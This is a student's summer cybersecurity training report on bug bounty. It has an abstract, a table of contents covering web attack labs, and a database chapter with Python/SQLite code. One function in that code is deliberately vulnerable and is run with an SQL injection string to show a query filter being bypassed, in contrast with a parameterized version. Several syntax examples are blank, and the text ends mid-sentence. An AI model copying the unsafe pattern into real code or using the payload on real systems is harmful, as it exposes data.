Summer Training Report

The document outlines a summer training program on cybersecurity conducted at Digital Fortresses in collaboration with the Higher Technological Institute, focusing on bug bounty and various cybersecurity domains. The program included hands-on training in networking fundamentals, information gathering, Linux system administration, web application security, and advanced penetration testing, preparing participants to tackle real-world cybersecurity challenges. Acknowledgments are made to instructors and peers for their support throughout the training experience.

Higher Technological Institute
DigitalFortress

The Summer Training Program on Bug Bounty

Submitted to:
Dr. Mai Mohy
Lecturer at HTI, Electrical and Communication Department

Submitted by:

Name                         ID
Donia Ali Mohamed Alaa       20220181

AUGUST 2025
A Thesis Presented for the Accomplishment of the Summer Training
Higher Technological Institute, Tenth of Ramadan
ABSTRACT
The summer training program on Cybersecurity, conducted at Digital Fortresses in collaboration with the
Higher Technological Institute (HTI) and supervised by Instructor Adam, was an intensive and immersive
learning experience designed to develop the technical expertise and analytical skills necessary for securing
modern IT systems. The program combined a well-structured curriculum with hands-on practical exercises,
offering participants exposure to a broad spectrum of cybersecurity domains. Covering essential topics such
as networking fundamentals, information gathering, Linux system administration, Bash scripting, web
application security, and penetration testing, the course aimed to create a balance between theoretical
foundations and real-world application. This ensured that trainees not only understood the principles of
cybersecurity but could also apply them effectively in professional scenarios.

The training began with Networking Fundamentals, where participants explored the architecture of
computer networks, IP addressing schemes, subnetting, and security protocols. This was followed by
Information Gathering and Reconnaissance modules, which introduced both passive and active intelligence
collection methods to identify system weaknesses without detection, as well as targeted probing techniques
for vulnerability discovery. In parallel, participants completed Linux System Administration training, gaining
the ability to configure and secure Linux-based environments, manage users and permissions, and monitor
system performance. The Bash Scripting component further enhanced these skills by teaching automation
techniques for administrative and security tasks, significantly improving operational efficiency.

The Web Application Security Testing segment was a cornerstone of the program, focusing on real-world
vulnerabilities and their exploitation. Trainees learned to identify and mitigate threats such as SQL injection,
Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), path traversal, file inclusion, and
authentication bypass. These sessions were complemented by practical labs using professional tools,
including Burp Suite for intercepting and manipulating HTTP requests, Nmap for network mapping and
scanning, and Metasploit for controlled exploitation of security flaws. The course emphasized secure coding
practices, proper configuration, and defensive measures to ensure that systems remain resilient against
evolving threats.

In its final phase, the program shifted toward Advanced Penetration Testing and Applied Cybersecurity
Projects. Participants simulated real attack scenarios, working in controlled lab environments to assess,
exploit, and secure vulnerable systems. These projects required integrating all previously acquired skills —
from reconnaissance to exploitation and post-exploitation — into a cohesive security assessment. The
collaborative and project-based approach fostered teamwork, critical thinking, and professional reporting
skills. Overall, this summer training provided a strong foundation in cybersecurity principles and practices,
preparing graduates to confront the challenges of today’s rapidly evolving threat landscape with
competence and confidence.

Acknowledgement
This report is wholeheartedly dedicated to my beloved family and friends, whose unwavering support,
encouragement, and belief in my abilities have been a constant source of motivation, strength, and
inspiration throughout my journey. Their faith in me has given me the courage to face challenges, the
determination to strive for excellence, and the resilience to keep moving forward, even in difficult moments.
I am deeply grateful to Digital Fortresses for hosting and organizing this exceptional cybersecurity summer
training program, and to the Higher Technological Institute (HTI) for making it possible for students to gain
such a valuable learning experience that bridges academic study with real-world application. My sincere
appreciation goes to Dr. Mai, whose vision, guidance, and tireless dedication were instrumental in bringing
this program to life; her passion for education, mentorship, and student development has left a profound
and lasting impact on my academic and professional growth. I also extend my heartfelt thanks to our
instructor, Adam, for his patience, expertise, and commitment to ensuring that each trainee not only
understood theoretical concepts but also gained the practical skills essential for success in the cybersecurity
field. His dedication to teaching, his willingness to answer every question, and his encouragement to think
critically have greatly enhanced my learning experience. Finally, I dedicate this work to my fellow trainees,
whose teamwork, collaboration, and supportive spirit transformed this program into an inspiring journey of
shared growth, mutual respect, and lasting friendship, making every challenge an opportunity and every
achievement a collective celebration.

Table of Contents

ABSTRACT ............................................................................................................................................................ II
Acknowledgement.............................................................................................................................................. III
TABLE of CONTENT ............................................................................................................................................. IV
Abbreviations ...................................................................................................................................................... 0
Introduction ..................................................................................................................................................... 1
Chapter 1: Database Fundamentals with MySQL
1.1 Introduction to Databases ..................................................................................................................... 2
1.2 MySQL Basics ......................................................................................................................................... 4
1.3 Database Design .................................................................................................................................. 11
Chapter 2: Computer Networks .................................................................................................................... 15
2.1 Introduction to Networking ................................................................................................................. 15
2.2 Network Devices .................................................................................................................................. 18
Conclusion ................................................................................................................................................. 23
Conclusion ................................................................................................................................................. 29
Conclusion ................................................................................................................................................. 33
Chapter 3: Tools............................................................................................................................................. 34
3.1 gau (GetAllUrls) ....................................................................................................................................... 34
3.2 katana ...................................................................................................................................................... 34
3.3 assetfinder ............................................................................................................................................... 34
3.4 subfinder.................................................................................................................................................. 34
3.5 ffuf ........................................................................................................................................................... 34
3.6 arjun (aka gosarjun) ................................................................................................................................. 35
3.7 gospider ................................................................................................................................................... 35
3.8 gobuster................................................................................................................................................... 35
3.9 dirsearch .................................................................................................................................................. 36
4.1 Introduction to Information Gathering ................................................................................................... 36
4.1.1 What is Information Gathering? ....................................................................................................... 37
4.2 The Information Gathering Process: A Step-by-Step Guide .................................................................... 37
4.2.1 Identifying Objectives and Defining Scope ....................................................................................... 37
4.2.2 Selecting Appropriate Data Collection Methods .............................................................................. 37
4.2.3 Analyzing and Organizing Gathered Data......................................................................................... 38
4.3 Tactical Tools for Information Gathering ................................................................................................ 38
4.3.1 Network Mappers and Port Scanners .............................................................................................. 38
4.3.2 Packet Sniffers and Protocol Analyzers ............................................................................................ 38
4.3.3 Domain and IP Research Tools ......................................................................................................... 38
4.4 Advanced Techniques in Information Gathering..................................................................................... 39
4.4.1 Penetration Testing with Metasploit Framework ............................................................................ 39
4.4.2 Data Mining for In-depth Analysis .................................................................................................... 39
4.4.3 Leveraging Search Engines and Online Resources ........................................................................... 39
4.5 Practical Applications .............................................................................................................................. 39
4.5.1 Case Studies ...................................................................................................................................... 39
4.5.2 Cybersecurity .................................................................................................................................... 39
4.5.3 Market Research............................................................................................................................... 39
4.6 Ethical Considerations in Information Gathering .................................................................................... 39
4.7 Maximizing Efficiency in Information Gathering ..................................................................................... 40
4.8 Frequently Asked Questions (FAQ) ......................................................................................................... 40
Chapter 5: vulnerabilities .................................................................................................................................. 41
5.1 Information disclosure vulnerabilities ..................................................................................................... 41
5.1.1 What is information disclosure?....................................................................................................... 41
5.1.2 Examples of information disclosure ................................................................................................. 42
5.1.3 How do information disclosure vulnerabilities arise? .................................................... 42
5.1.4 What is the impact of information disclosure vulnerabilities? ...................................................... 43
5.1.5 Exploiting information disclosure ................................................................................................... 44
5.1.6 How to prevent information disclosure vulnerabilities ................................................................. 44
5.2 SQL injection ............................................................................................................................................ 45
5.2.1 What is SQL injection (SQLi)? ........................................................................................................... 45
5.2.2 What is the impact of a successful SQL injection attack? ................................................................ 46
5.2.3 How to detect SQL injection vulnerabilities ..................................................................................... 46
5.2.4 SQL Injection Examples ................................................................................................... 47
5.3 OS command injection............................................................................................................................ 48
5.3.1 What is OS command injection? ...................................................................................................... 48
5.3.2 Basic Example ................................................................................................................................... 49
5.3.3 Useful Commands After Finding Injection........................................................................................ 49
5.3.4 Blind OS Command Injection Techniques ........................................................................................ 49
5.3.5 Shell Metacharacters for Injection ................................................................................................... 49
5.3.6 Quoted Context Issues ..................................................................................................................... 49
5.3.7 Prevention ........................................................................................................................................ 49
5.4 Path traversal........................................................................................................................................... 49

5.4.1 What is path traversal? .................................................................................................................... 50
5.4.2 Basic Path Traversal .......................................................................................................................... 50
5.4.3 Obstacles & Bypasses ....................................................................................................................... 51
5.5 Local File Inclusion (LFI) ........................................................................................................................... 51
5.5.1 How LFI Works .................................................................................................................................. 52
5.5.2 Identifying LFI ................................................................................................................................... 52
5.5.3 LFI Attack Scenarios .......................................................................................................................... 52
5.5.4 Impacts of LFI.................................................................................................................................... 52
5.5.5 LFI Remediation ................................................................................................................................ 53
5.6 Server-side request forgery (SSRF)...................................................................................................... 53
5.6.1 What is SSRF? ................................................................................................................................... 53
5.6.2 What is the impact of SSRF attacks? ................................................................................................ 54
5.6.3 Common SSRF attacks ...................................................................................................................... 54
5.6.4 SSRF Attacks Against Other Back-End Systems ................................................................................ 56
5.6.5 Circumventing Common SSRF Defenses........................................................................................... 56
5.6.6 SSRF with Whitelist-Based Input Filters ........................................................................................... 57
5.6.7 A New Era of SSRF: Bypassing Filters via Open Redirection ............................................................. 57
5.6.8 Blind SSRF Vulnerabilities ................................................................................................................. 58
5.6.9 Finding and Exploiting Blind SSRF ..................................................................................................... 58
5.6.10 SSRF via URLs in Data Formats ....................................................................................................... 58
5.6.11 SSRF via the Referer Header ........................................................................................................... 58
5.7 Insecure direct object references (IDOR) ................................................................................................ 59
5.7.1 What are insecure direct object references (IDOR)? .................................................................. 59
5.7.2 IDOR examples.................................................................................................................................. 59
IDOR Vulnerabilities: ................................................................................................................................. 59
Chapter 6: Laps .................................................................................................................................. 59
6.1 SQLI .......................................................................................................................................................... 59
5.8 Authentication Bypass ............................................................................................................................. 60
5.8.1 Common causes of authentication bypass ....................................................................................... 61
5.8.2 Preventing Authentication Bypass ................................................................................................... 61
Lab 6.1.1: ................................................................................................................................................... 61
Lap 6.1.2 .................................................................................................................................................... 63
6.2 Authentication ......................................................................................................................................... 65
6.2.1 Lab 1 Username enumeration via different responses .................................................................... 65
6.2.2 Lab 2 2FA simple bypass ................................................................................................................... 67
6.2.3 Lab 3 Password Reset Broken Logic ................................................................................................. 67

6.2.4 Lab 4 Username enumeration via subtly different responses ......................................................... 68
6.3 Server-Side Request Forgery (SSRF) ........................................................................................................ 69
6.3.1 Lab 1 Basic SSRF against the local server ......................................................................................... 70
6.3.2 Lab 2 Basic SSRF against another back-end system ......................................................................... 72
6.3.3 Lab 3 Blind SSRF with out-of-band detection ................................................................................... 73
6.4 Some CTFS ............................................................................................................................................... 73
6.4.1 Lap1 .................................................................................................................................................. 74
6.4.2 Lap2 :Challenge Name: Can you find the robots? ............................................................................ 75
6.5 OS command injection ............................................................................................................................ 79
6.5.1 Lap 1 ................................................................................................................................................. 81
6.5.2 lap 2 .................................................................................................................................................. 83
6.5.3 Lap 3 ................................................................................................................................................. 85
6.6 Path Traversal .......................................................................................................................................... 88
6.6.1 Lab 1 File path traversal, simple case ............................................................................................... 89
6.6.2 Lab 2 File path traversal, traversal sequences blocked with absolute path bypass......................... 90
6.6.3 Lab 3 File path traversal, traversal sequences stripped non-recursively....................................... 91
6.6.4 Lab 4 File path traversal, traversal sequences stripped with superfluous URL-decode ............... 92
6.7 Business Logic Vulnerability ................................................................................................................ 92
Conclusion ....................................................................................................................................................... 106
References ....................................................................................................................................................... 107

Abbreviations

Abbreviation            Full Form
gau                     Get All URLs
katana                  Katana Scanner Tool
SSRF                    Server-Side Request Forgery
SQLi                    SQL Injection
IDOR                    Insecure Direct Object Reference
LFI                     Local File Inclusion
OS Command Injection    Operating System Command Injection
LAPs                    Labs And Practicals
API                     Application Programming Interface
DNS                     Domain Name System
HTTP                    Hypertext Transfer Protocol
URL                     Uniform Resource Locator
WAF                     Web Application Firewall
SQL                     Structured Query Language
HTML                    Hypertext Markup Language
XML                     eXtensible Markup Language

Introduction

In the modern digital era, web applications have become the backbone of communication, commerce,
education, and innovation. Their ability to deliver dynamic content, process user interactions, and store sensitive
information makes them indispensable across industries. However, this growing reliance on web applications has
also made them a prime target for cyber threats, where attackers exploit vulnerabilities to gain unauthorized
access, steal data, or disrupt services. As technology continues to evolve, the methods of attack have become
more sophisticated, requiring equally advanced and proactive approaches to security testing.

This report explores fundamental aspects of networking, information gathering, and vulnerability assessment,
with a particular emphasis on understanding the mechanisms through which web applications operate and how
they can be exploited if not properly secured. Networking fundamentals provide the essential knowledge of how
data travels between systems, the protocols that govern communication, and the underlying infrastructure that
supports web-based operations. Information gathering techniques, both passive and active, form the foundation
of security testing, allowing testers to map the target environment, identify potential entry points, and assess the
scope of the application’s exposure.

The study then delves into common vulnerabilities encountered during penetration testing, such as information
disclosure, SQL injection, command injection, path traversal, file inclusion, Server-Side Request Forgery (SSRF),
Insecure Direct Object References (IDOR), and authentication bypass. Each of these vulnerabilities represents a
potential threat vector that, if left unaddressed, can have significant consequences for the confidentiality,
integrity, and availability of an application and its data.

In addition to theoretical analysis, this report also outlines practical applications through Laboratory Activities
and a Website Project. These hands-on components provide an opportunity to implement learned concepts,
simulate real-world attack scenarios, and explore mitigation strategies. By bridging theoretical understanding
with applied practice, the report ensures that the reader gains both conceptual clarity and technical proficiency.

Ultimately, the aim of this document is not only to present a comprehensive overview of web application
security testing but also to emphasize the importance of adopting a proactive and systematic approach to
safeguarding digital assets. With cyber threats becoming more frequent and damaging, security testing is no
longer an optional phase in the development lifecycle — it is a necessity that must be integrated into every stage
of system design, deployment, and maintenance. Through this detailed examination, the report aspires to equip
readers with the knowledge and skills necessary to identify vulnerabilities, understand their impact, and
implement effective countermeasures in a rapidly changing threat landscape.

1.1 Introduction to Databases
Databases are an essential component of modern computing, serving as the backbone for data storage,
retrieval, and management in virtually every sector. From small personal projects to large-scale
enterprise systems, databases play a crucial role in ensuring data integrity, accessibility, and
performance. This chapter provides a comprehensive overview of databases, their significance, and
the various types and technologies that underpin them.

Figure 0.1.1

1.1.1 Definition and Purpose

A database is a structured collection of data that is stored and accessed electronically. The primary
purpose of a database is to efficiently store, manage, and retrieve large volumes of data in a way that
supports various applications and user needs. Databases are designed to handle complex queries and
transactions, ensuring that data is consistently available and accurately represented.

1.1.2 Database vs. File Systems

While both databases and file systems are used for data storage, they serve different purposes and
offer distinct advantages:

• File Systems: Traditional file systems store data in a hierarchical structure of files and
directories. They are suitable for simple storage needs but lack advanced querying
capabilities and data integrity mechanisms.
• Databases: Databases provide a more sophisticated approach to data management, offering
powerful querying languages (like SQL), transaction management, and data integrity
features. They are optimized for handling large datasets and complex relationships between
data entities.

1.1.3 Types of Databases

Databases can be broadly categorized into three types based on their data models and storage
mechanisms:

Figure 1.2

1- Relational Databases (RDBMS)

• Definition: Relational databases use a structured schema to organize data into tables (relations)
with predefined columns and data types. Each table can have relationships with other tables,
enforced through foreign keys.
• Examples: MySQL, PostgreSQL, Oracle Database, Microsoft SQL Server.
• Use Cases: Transactional applications, enterprise systems, data warehousing.

2- NoSQL Databases

• Definition: NoSQL databases are designed to handle unstructured or semi-structured data,
offering flexible schemas and scalable architectures. They do not rely on fixed table structures
or SQL for querying.
• Subtypes:
o Document Stores: Store data as JSON or BSON documents (e.g., MongoDB, CouchDB).
o Key-Value Stores: Store data as key-value pairs (e.g., Redis, DynamoDB).
o Column Stores: Store data in columns rather than rows (e.g., Apache Cassandra, HBase).
o Graph Databases: Store data as nodes and edges, representing relationships (e.g., Neo4j,
ArangoDB).
• Use Cases: Real-time analytics, content management, social networks, IoT applications.

3- NewSQL Databases

• Definition: NewSQL databases aim to combine the scalability of NoSQL systems with the
consistency and ACID (Atomicity, Consistency, Isolation, Durability) properties of traditional
RDBMS.
• Examples: Google Spanner, CockroachDB, VoltDB.
• Use Cases: Large-scale transactional applications, high-performance OLTP (Online Transaction
Processing) systems.

1.1.4 Importance of Databases

Databases are vital for various reasons:

• Data Integrity: Databases enforce rules and constraints to ensure data accuracy and
consistency.
• Scalability: Modern databases are designed to handle increasing amounts of data and user
load.
• Security: Databases provide robust security features to protect sensitive data from
unauthorized access and breaches.
• Performance: Efficient indexing and query optimization techniques enable fast data retrieval,
even for complex queries.
• Data Management: Databases support complex data relationships and transactions, making it
easier to manage and manipulate data.

In conclusion, understanding the fundamentals of databases is crucial for any aspiring IT professional.
This chapter sets the stage for more in-depth exploration of specific database technologies and their
applications, starting with the MySQL relational database system, which is widely used and renowned
for its reliability and performance in various environments.

1.2 MySQL Basics


MySQL is one of the most widely used relational database management systems (RDBMS). It is known
for its reliability, performance, and ease of use, making it a popular choice for a wide range of
applications from small-scale projects to large enterprise solutions. This section covers the basics of
MySQL, including its installation and configuration, as well as fundamental SQL commands.

Figure 1.3

1.2.1 Installation and Configuration

Installing and configuring MySQL involves several steps, depending on the operating system you are
using. Below are general steps for installation on common platforms:

1.2.1.A Installation on Windows

1. Download MySQL Installer:
o Visit the MySQL official website and download the MySQL Installer for Windows.

Figure 1.4

2. Run the Installer:
o Launch the downloaded installer file.

Figure 1.5

o Choose the setup type (Full, Developer Default, Server Only, etc.) based on your
requirements.

Figure 1.6

3. Configure MySQL Server:
o Choose a configuration type (Standalone MySQL Server, InnoDB Cluster, etc.).

Figure 1.7

o Configure the MySQL Server (e.g., setting the root password, default port, and server
configuration).

Figure 1.8

4. Start MySQL Server:
o Start the MySQL service from the Windows Services panel or the MySQL Workbench.

5. Verify Installation:
o Open MySQL Workbench or the MySQL command-line client and connect to the MySQL
server using the root user credentials.

Figure 1.9

1.2.1.B Installation on Linux

Figure 1.10

1. Update Package Index:
o Run sudo apt-get update (Debian-based) or sudo yum update (Red Hat-based) to update the
package index.
2. Install MySQL Server:
o Run sudo apt-get install mysql-server for Debian-based systems or sudo yum install mysql-server
for Red Hat-based systems.
3. Start MySQL Service:
o Start the MySQL service using sudo systemctl start mysql (systemd) or sudo service mysqld start
(SysVinit).
4. Secure MySQL Installation:
o Run sudo mysql_secure_installation and follow the prompts to set the root password and
secure the MySQL installation.
5. Verify Installation:
o Connect to the MySQL server using mysql -u root -p and verify the installation.

1.2.2 Basic Configuration

1. MySQL Configuration File:
o The main configuration file for MySQL is my.cnf (Linux) or my.ini (Windows).
o This file is typically located in /etc/mysql/ (Linux) or the MySQL installation directory (Windows).

Figure 1.11

2. Common Configuration Options:
o [mysqld]: This section configures the MySQL server. Common options include:
▪ port: The port number MySQL listens on (default is 3306).
▪ datadir: The directory where MySQL stores its data.
▪ max_connections: The maximum number of simultaneous connections.
▪ default_authentication_plugin: The default authentication plugin used.
3. Restart MySQL Service:
o After making changes to the configuration file, restart the MySQL service to apply the
changes using sudo systemctl restart mysql (systemd) or sudo service mysqld restart (SysVinit).
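As an added example (written for this report, not part of the training material or of MySQL itself), the script below reads the [mysqld] section of a my.cnf file, applies the built-in defaults for the options listed above, and flags two settings a reviewer would question before exposing the server. The file content is constructed; the bind_address and skip_networking checks are assumptions about what a hardening review looks for, and the 151 default for max_connections is MySQL's documented default.

```python
import configparser
from typing import Dict, List

# Added example: read the [mysqld] section of a my.cnf file and report the
# effective values of the options listed above. The file content is constructed.
SAMPLE_MY_CNF = """\
# constructed sample, not copied from any real server
[client]
port = 3306

[mysqld]
datadir = /var/lib/mysql
max_connections = 200
default_authentication_plugin = mysql_native_password
!includedir /etc/mysql/conf.d/
"""

# Built-in defaults used when an option is absent from the file
DEFAULTS = {"port": "3306", "max_connections": "151"}


def parse_mysqld_section(text: str) -> Dict[str, str]:
    """Return [mysqld] options as a dict, with '-' normalised to '_' in option names.
    '!include' / '!includedir' lines are MySQL extensions that configparser cannot
    parse, so they are dropped before parsing."""
    lines = [ln for ln in text.splitlines() if not ln.lstrip().startswith("!")]
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    parser.read_string("\n".join(lines))
    if not parser.has_section("mysqld"):
        return {}
    return {
        key.replace("-", "_"): ("" if value is None else value.strip())
        for key, value in parser.items("mysqld")
    }


def effective_settings(opts: Dict[str, str]) -> Dict[str, str]:
    """Defaults first, then whatever the file sets on top of them."""
    settings = dict(DEFAULTS)
    settings.update(opts)
    return settings


def review(opts: Dict[str, str]) -> List[str]:
    """Flag settings a reviewer would question (assumed review checks)."""
    findings = []
    if opts.get("default_authentication_plugin") == "mysql_native_password":
        findings.append("default_authentication_plugin=mysql_native_password: "
                        "caching_sha2_password is the current default and stronger")
    # With neither bind_address nor skip_networking set, the server listens on every interface.
    if "skip_networking" not in opts and opts.get("bind_address", "*") in ("*", "0.0.0.0", "::"):
        findings.append("no bind_address restriction: TCP port "
                        + effective_settings(opts)["port"] + " is reachable on all interfaces")
    return findings


if __name__ == "__main__":
    options = parse_mysqld_section(SAMPLE_MY_CNF)
    print(effective_settings(options))
    for finding in review(options):
        print("-", finding)
```

Because MySQL accepts both `bind-address` and `bind_address`, the parser normalises names before the checks run; the same file would otherwise pass or fail depending on which spelling the administrator used.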

1.2.3 Basic SQL Commands

SQL (Structured Query Language) is the standard language for interacting with relational databases.
The basic SQL commands for data manipulation include SELECT, INSERT, UPDATE, and DELETE.

SELECT
The SELECT statement is used to retrieve data from one or more tables. Syntax:

Example:

INSERT
The INSERT statement is used to add new records to a table. Syntax:

Example:

UPDATE
The UPDATE statement is used to modify existing records in a table. Syntax:

Example:

DELETE
The DELETE statement is used to remove records from a table. Syntax:

Example:

These basic SQL commands form the foundation for interacting with MySQL databases. Mastery of
these commands is essential for managing and manipulating data effectively in a relational database.
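The four commands above, as an added example written for this report (not part of the training material): each statement runs through Python's sqlite3 module so the example works without a MySQL server, and the SQL is the same for these basics. The patients table and the names in it are constructed. The example also shows why the input of a WHERE clause should be passed as a parameter rather than pasted into the SQL text, which is the SQL injection problem Chapter 2 names.

```python
import sqlite3
from typing import List, Tuple

# Added example: SELECT, INSERT, UPDATE and DELETE through Python's sqlite3 module.
# The table, names and numbers below are constructed sample data.


def open_db() -> sqlite3.Connection:
    """Create an in-memory database with a small 'patients' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE patients ("
        "  patient_id INTEGER PRIMARY KEY,"
        "  first_name TEXT NOT NULL,"
        "  last_name  TEXT NOT NULL,"
        "  contact_number TEXT)"
    )
    return conn


def insert_patient(conn: sqlite3.Connection, first: str, last: str, contact: str) -> int:
    """INSERT: add a row. The '?' placeholders keep the values out of the SQL text."""
    cur = conn.execute(
        "INSERT INTO patients (first_name, last_name, contact_number) VALUES (?, ?, ?)",
        (first, last, contact),
    )
    conn.commit()
    return cur.lastrowid


def select_by_last_name(conn: sqlite3.Connection, last: str) -> List[Tuple]:
    """SELECT with a parameterized WHERE clause: the input is only ever a value."""
    return conn.execute(
        "SELECT patient_id, first_name, last_name FROM patients WHERE last_name = ?",
        (last,),
    ).fetchall()


def select_by_last_name_unsafe(conn: sqlite3.Connection, last: str) -> List[Tuple]:
    """The same query built by string concatenation: the input becomes part of the SQL.
    Shown only for contrast with the parameterized version above."""
    sql = ("SELECT patient_id, first_name, last_name FROM patients "
           "WHERE last_name = '" + last + "'")
    return conn.execute(sql).fetchall()


def update_contact(conn: sqlite3.Connection, patient_id: int, contact: str) -> int:
    """UPDATE: change one row; returns the number of rows affected."""
    cur = conn.execute(
        "UPDATE patients SET contact_number = ? WHERE patient_id = ?",
        (contact, patient_id),
    )
    conn.commit()
    return cur.rowcount


def delete_patient(conn: sqlite3.Connection, patient_id: int) -> int:
    """DELETE: remove one row; returns the number of rows affected."""
    cur = conn.execute("DELETE FROM patients WHERE patient_id = ?", (patient_id,))
    conn.commit()
    return cur.rowcount


def demo() -> dict:
    """Run all four commands and compare the safe and unsafe SELECT on hostile input."""
    conn = open_db()
    first_id = insert_patient(conn, "Ahmed", "Ali", "0100000001")
    second_id = insert_patient(conn, "Sara", "Nabil", "0100000002")
    hostile = "' OR 1=1 --"   # a last name nobody has
    result = {
        "ali_rows": len(select_by_last_name(conn, "Ali")),                      # 1
        "safe_hostile_rows": len(select_by_last_name(conn, hostile)),           # 0: treated as text
        "unsafe_hostile_rows": len(select_by_last_name_unsafe(conn, hostile)),  # 2: WHERE bypassed
        "updated": update_contact(conn, first_id, "0100000003"),                # 1
        "deleted": delete_patient(conn, second_id),                             # 1
        "remaining": conn.execute("SELECT COUNT(*) FROM patients").fetchone()[0],  # 1
    }
    conn.close()
    return result


if __name__ == "__main__":
    print(demo())
```

The parameterized SELECT returns no rows for the hostile string because the database compares it as a literal last name; the concatenated version returns every row because the string has changed the shape of the query.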

1.3 Database Design


Database design is a critical aspect of developing an efficient and effective database system. It involves
planning and structuring a database to meet the requirements of users and applications while ensuring
data integrity, performance, and scalability. This section explores key concepts in database design,
including Entity-Relationship (ER) modeling, normalization, and practical considerations for designing
a robust database.

Figure 1.12

1.3.1 Entity-Relationship (ER) Modeling


ER modeling is a conceptual approach to database design that visually represents the structure of the
database. It uses entities, attributes, and relationships to depict how data is organized and how
different data elements are related.

Figure 1.13

Entities:
Entities are objects or things in the real world that have a distinct existence. Each entity represents a
table in the database. For example, in a hospital database, entities could include Patient, Doctor,
Appointment, and Medication.

Attributes:

Attributes are properties or characteristics of entities. Each attribute corresponds to a column in the
table. For instance, the Patient entity might have attributes like PatientID, FirstName, LastName, DateOfBirth,
and ContactNumber.

Relationships:
Relationships describe how entities are connected to one another. They can be one-to-one, one-to-
many, or many-to-many. For example, a Doctor can have many Appointments, but each Appointment is
associated with only one Doctor. This is a one-to-many relationship.

ER Diagram Example:

• Entities: Patient, Doctor, Appointment
• Attributes:
o Patient: PatientID, FirstName, LastName, DateOfBirth, ContactNumber
o Doctor: DoctorID, FirstName, LastName, Specialization, ContactNumber
o Appointment: AppointmentID, PatientID, DoctorID, AppointmentDate, Reason
• Relationships:
o Patient to Appointment (one-to-many)
o Doctor to Appointment (one-to-many)

1.3.2 Normalization

Normalization is a process used to organize a database into tables and columns to reduce data
redundancy and improve data integrity. The primary goal of normalization is to ensure that each
piece of data is stored in only one place.

Figure 1.14

Normal Forms:
Normalization involves applying a series of rules called normal forms. The most commonly used normal
forms are:

1. First Normal Form (1NF):
o Ensure that each table column contains atomic (indivisible) values.
o Each column must contain only one value per row.
o Remove any repeating groups of columns.
2. Second Normal Form (2NF):
o Meet all requirements of 1NF.
o Remove partial dependencies; ensure that non-key attributes are fully dependent on
the primary key.
3. Third Normal Form (3NF):
o Meet all requirements of 2NF.
o Remove transitive dependencies; ensure that non-key attributes are not dependent on
other non-key attributes.

1.3.3 Practical Considerations

In addition to ER modeling and normalization, there are several practical considerations in database
design:

• Performance: Consider indexing frequently queried columns to improve retrieval speed.
However, be mindful of the trade-off between read performance and write performance.
• Scalability: Design the database to handle increasing amounts of data and user load. This may
involve partitioning large tables or using distributed databases.
• Security: Implement access controls and encryption to protect sensitive data. Ensure that only
authorized users can access and modify data.
• Backup and Recovery: Plan for regular backups and ensure that recovery procedures are in
place to protect against data loss.
• Consistency and Integrity: Use constraints (e.g., primary keys, foreign keys, unique constraints)
to enforce data integrity and maintain consistency.
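The hospital ER model from 1.3.1 (Patient, Doctor, Appointment) written as a normalized schema with the constraints listed in 1.3.3, as an added example for this report rather than material from the training. It uses SQLite instead of MySQL so it runs without a server; column names follow the ER example, the doctor and patient rows are constructed, and the UNIQUE constraint on (doctor_id, appointment_date) is an added assumption (one doctor cannot be booked twice for the same time). The index on doctor_id is the "index frequently queried columns" advice applied to the foreign key that joins use.

```python
import sqlite3
from typing import Dict

# Added example: the Patient/Doctor/Appointment schema in 3NF with primary keys,
# foreign keys, a unique constraint and an index. Sample rows are constructed.
SCHEMA = """
CREATE TABLE doctor (
    doctor_id      INTEGER PRIMARY KEY,
    first_name     TEXT NOT NULL,
    last_name      TEXT NOT NULL,
    specialization TEXT NOT NULL,
    contact_number TEXT
);
CREATE TABLE patient (
    patient_id     INTEGER PRIMARY KEY,
    first_name     TEXT NOT NULL,
    last_name      TEXT NOT NULL,
    date_of_birth  TEXT NOT NULL,
    contact_number TEXT
);
CREATE TABLE appointment (
    appointment_id   INTEGER PRIMARY KEY,
    patient_id       INTEGER NOT NULL REFERENCES patient(patient_id),
    doctor_id        INTEGER NOT NULL REFERENCES doctor(doctor_id),
    appointment_date TEXT NOT NULL,
    reason           TEXT,
    UNIQUE (doctor_id, appointment_date)   -- assumed rule: one booking per doctor per slot
);
CREATE INDEX idx_appointment_doctor ON appointment(doctor_id);
"""


def create_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")   # SQLite only enforces FKs when asked
    conn.executescript(SCHEMA)
    return conn


def seed(conn: sqlite3.Connection) -> None:
    """Constructed sample rows: one doctor, two patients, two appointments."""
    conn.execute("INSERT INTO doctor VALUES (1, 'Mona', 'Said', 'Cardiology', '0100000001')")
    conn.execute("INSERT INTO patient VALUES (1, 'Ahmed', 'Ali', '1990-05-01', '0100000002')")
    conn.execute("INSERT INTO patient VALUES (2, 'Sara', 'Nabil', '1985-09-12', '0100000003')")
    conn.execute("INSERT INTO appointment VALUES (1, 1, 1, '2025-08-01 09:00', 'check-up')")
    conn.execute("INSERT INTO appointment VALUES (2, 2, 1, '2025-08-01 10:00', 'follow-up')")
    conn.commit()


def try_insert(conn: sqlite3.Connection, sql: str) -> bool:
    """Return True if the row was accepted, False if a constraint rejected it."""
    try:
        conn.execute(sql)
        conn.commit()
        return True
    except sqlite3.IntegrityError:
        conn.rollback()
        return False


def appointments_per_doctor(conn: sqlite3.Connection) -> Dict[str, int]:
    """Join across the one-to-many relationship (Doctor -> Appointment)."""
    rows = conn.execute(
        "SELECT d.last_name, COUNT(a.appointment_id) "
        "FROM doctor d LEFT JOIN appointment a ON a.doctor_id = d.doctor_id "
        "GROUP BY d.doctor_id"
    ).fetchall()
    return dict(rows)


def demo() -> dict:
    conn = create_db()
    seed(conn)
    return {
        # patient 99 does not exist: the foreign key rejects the orphan row
        "orphan_rejected": not try_insert(
            conn, "INSERT INTO appointment VALUES (3, 99, 1, '2025-08-02 09:00', 'x')"),
        # doctor 1 already has 09:00 on 2025-08-01: the unique constraint rejects it
        "double_booking_rejected": not try_insert(
            conn, "INSERT INTO appointment VALUES (4, 2, 1, '2025-08-01 09:00', 'y')"),
        "valid_accepted": try_insert(
            conn, "INSERT INTO appointment VALUES (5, 2, 1, '2025-08-02 09:00', 'z')"),
        "per_doctor": appointments_per_doctor(conn),   # {'Said': 3}
    }


if __name__ == "__main__":
    print(demo())
```

Keeping the doctor's name only in the doctor table (and referencing it by doctor_id from appointment) is what 2NF and 3NF ask for: a change of contact number is one UPDATE, and the join above still reconstructs the full picture.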

In conclusion, effective database design is crucial for developing a robust and efficient database
system. By employing ER modeling, normalization, and considering practical aspects of performance,
